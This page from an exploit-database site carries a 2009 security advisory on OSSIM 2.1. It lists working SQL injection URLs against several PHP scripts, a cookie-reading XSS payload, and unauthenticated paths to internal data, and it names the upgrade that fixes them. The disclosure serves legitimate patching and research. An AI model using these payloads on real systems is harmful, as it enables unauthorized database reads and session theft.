0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OSSIM 2.1 SQL Injection and xss
[=============================== OSSIM 2.1 SQL Injection and xss =============================== OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities. 1. SQL Injections 2. Linked XSS 3. Unauthorized access Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055 Application: OSSIM Versions Affected: 2.1 and may be 2.1.1 Vendor URL: http://ossim.net/ Bug: SQL Injection,XSS, Unauthorized access Exploits: YES Reported: 07.09.2009 Vendor response: 09.09.2009 Solution: YES (version 2.1.2) Date of Public Advisory:21.09.2009 Author: Sintsov Alexey of Digital Security Research Group [DSecRG] Details ******* 1.1 SQL injections in repository Attacker need to be authorized in system for success. Vulnerable script - repository_document.php Vulnerable parameter - id_document Example ******* http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3 union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1 1.2 SQL injections in repository Attacker need to be authorized in system for success. Vulnerable script - repository_links.php Vulnerable parameter - id_document Example ******* http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3 union select 1,user(),3,4,5,6 1.3 SQL injections in repository Attacker need to be authorized in system for success. Vulnerable script - repository_editdocument.php Vulnerable parameter - id_document Example ******* http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3 union select 1,user(),3,4,5,6 1.4 SQL injection in policy scripts Attacker need to be authorized in system for success. Vulnerable script - getpolicy.php Vulnerable parameter - group Example ******* http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1 1.5 SQL injection in policy scripts Attacker need to be authorized in system for success. Vulnerable script - newhostgroupform.php Vulnerable parameter - name Example ******* http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select user(),'b','c','d','f 1.6 SQL injection in policy scripts Attacker need to be authorized in system for success. Vulnerable script - modifynetform.php Vulnerable parameter - name Example ******* http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select user(),'b','c','d','e','f','g','h','a And others scripts in policy menu. 2. Linked XSS in main menu Vulnerable script /ossim/ Vulnerable parameter - option Example ******* http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a=" 3. Access to data without authentication. Unauthorized user can see graphs and infrastructure Example ******* Access to the graph: http://OSSIM-SERVER/ossim/graphs/alarms_events.php Internal infrastructure view: http://OSSIM-SERVER/ossim/host/draw_tree.php Fix Information *************** Upgrade to version 2.1.2 # 0day.today [2024-10-05] #